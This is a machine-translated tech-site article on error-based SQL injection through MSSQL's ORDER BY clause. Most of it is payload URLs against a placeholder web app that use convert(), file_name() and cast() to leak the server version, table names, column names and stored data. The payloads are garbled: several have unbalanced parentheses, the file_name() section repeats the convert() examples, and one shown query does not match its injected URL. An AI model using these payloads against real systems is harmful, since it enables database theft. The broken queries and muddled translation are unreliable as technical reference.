Shulou(Shulou.com)05/31 Report--

In this issue, the editor will bring you about how to understand the SQL injection technology based on MSSQL "order by" sentence. The article is rich in content and analyzes and describes for you from a professional point of view. I hope you can get something after reading this article.

The SQL injection vulnerability we are going to exploit occurs when user-supplied data is passed through a value in MSSQL's "Order By" statement, and if there is a syntax error in the SQL query, the application throws a SQL Server error.

If the user-supplied data is passed to the SQL query as a column name in the "Order By" clause, then the conventional "wrong-based SQL injection" exploit technique will not work.

Because SQL Server has predefined a set of security rules for SQL queries, we cannot use conventional "error-based SQL injection" techniques to exploit SQL injection vulnerabilities in applications.

However, because the user can specify the function name after the Order by clause, and at the same time, some SQL server functions can execute queries passed in parameters and try to perform certain operations on the results of the injected queries, and throw an error if the operation encounters a problem, so if we attack these functions, then these functions will expose the results of the injected SQL queries-- this is our way of thinking.

Vulnerability exploitation

Let's start with the functions that can be used for error-based SQL injection attacks. (content recommendation > Analysis and exploitation of SQL injection vulnerabilities)

In fact, there are a few SQL server functions that can meet our requirements: execute the SQL query specified by its parameters, perform the specified operation on the query result, and give the SQL query result with an error message.

Convert () is a function that meets the above requirements and is often used in error-based SQL injection attacks because it converts the second parameter according to the data type specified in the first parameter.

For example, for convert (int,@@version), the convert function first executes the SQL query specified in the second parameter, and then attempts to convert the query result to type int. However, because the result of this SQL query is of type varchar, the specified conversion cannot be performed, so the convert function throws a SQL server error message indicating that the "SQL query result" cannot be converted to "int" so that the attacker can get the result of the SQL query.

The functions that meet the above requirements are listed below:

Convert ()

File_name ()

Db_name ()

Col_name ()

Filegroup_name ()

Object_name ()

Schema_name ()

Type_name ()

Cast ()

Demo:

Suppose there is a URL with a SQL injection vulnerability that passes the value of a parameter named "order" in the HTTP GET method (which is specified by the user) to the SQL query. The URL is as follows:

Http://vulnerable_webapp/vulnerable.asp?data=yes&order=column_name

The application then receives the user-supplied data from the parameter "order" of the HTTP GET method and generates an SQL query like this:

Select table_name,column_name from information_schema.columns order by column_name

Convert () function

Query SQL server version

URL after injecting relevant commands:

Http://vulnerable_webapp/vulnerable.asp?data=yes&order=convert(int,@@version)

The query actually executed in the background:

Select table_name,column_name from information_schema.columns order by

Convert (int,@@version)

Extract the table name of the current database

URL after injecting relevant commands:

Http://vulnerable_webapp/vulnerable.asp?data=yes&order=CONVERT(int,(select top (1)

Table_name from information_schema.columns))

The query actually executed in the background:

Select table_name,column_name from information_schema.columns order by

CONVERT (int, (select top (1) table_name from information_schema.tables))

Extract column names from the table

When extracting column names, we can use cast () to specify which tables to extract column names from. It is important to note that the table name here is represented in "hexadecimal" form.

URL after injecting relevant commands:

Http://vulnerable_webapp/vulnerable.asp?data=yes&order= convert (int, select top (1)

COLUMN_NAME from information_schema.columns where

TABLE_NAME=cast (0x7370745f66616c6c6261636b5f6462 as varchar)

The query actually executed in the background:

Select table_name,column_name from INFORMATION_SCHEMA.COLUMNS order by

Convert (int, (select top (1) COLUMN_NAME from information_schema.columns where)

TABLE_NAME=cast (0x7370745f66616c6c6261636b5f6462 as varchar)

Extract column data from a table

Extracting data from the columns of a data table is not really complicated, just specify the column name and table name in the SQL query. In this case, the column I use is named 'xserver_name', table name' spt_fallback_db'.

URL after injecting relevant commands:

Http://vulnerable_webapp/vulnerable.asp?data=yes&order=convert(int,(select top (1)

Xserver_name from spt_fallback_db))

The query actually executed in the background:

Select table_name,column_name from INFORMATION_SCHEMA.COLUMNS order by

Convert (int, (select top (1) xserver_name from spt_fallback_db))

File_name () function

Query SQL server version

URL after injecting relevant commands:

Http://vulnerable_webapp/vulnerable.asp?data=yes&order=file_name(@@version)

The query actually executed in the background:

Select table_name,column_name from information_schema.columns order by

File_name (@ @ version)

Extract the table name of the current database

URL after injecting relevant commands:

Http://vulnerable_webapp/vulnerable.asp?data=yes&order=CONVERT(int,(select top (1)

Table_name from information_schema.columns))

The query actually executed in the background:

Select table_name,column_name from information_schema.columns order by

CONVERT (int, (select top (1) table_name from information_schema.tables))

Extract column names from the table

When extracting column names, we can use cast () to specify which tables to extract column names from. It is important to note that the table name here is represented in "hexadecimal" form.

URL after injecting relevant commands:

Http://vulnerable_webapp/vulnerable.asp?data=yes&order= convert (int, select top (1)

COLUMN_NAME from information_schema.columns where

TABLE_NAME=cast (0x7370745f66616c6c6261636b5f6462 as varchar)

The query actually executed in the background:

Select table_name,column_name from INFORMATION_SCHEMA.COLUMNS order by

Convert (int, (select top (1) COLUMN_NAME from information_schema.columns where)

TABLE_NAME=cast (0x7370745f66616c6c6261636b5f6462 as varchar)

Extract column data from a table

Extracting column data from a data table is really simple, as long as you specify the column name and table name in the SQL query. In this case, the column I use is named 'xserver_name', table name' spt_fallback_db'.

URL after injecting relevant commands:

Http://vulnerable_webapp/vulnerable.asp?data=yes&order= file_name (select top (1)

Xserver_name from spt_fallback_db))

The query actually executed in the background:

Select table_name,column_name from INFORMATION_SCHEMA.COLUMNS order by

File_name (select top (1) xserver_name from spt_fallback_db))

The above is the editor for you to share how to understand the MSSQL "order by" statement based on SQL injection technology, if you happen to have similar doubts, you might as well refer to the above analysis to understand. If you want to know more about it, you are welcome to follow the industry information channel.

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.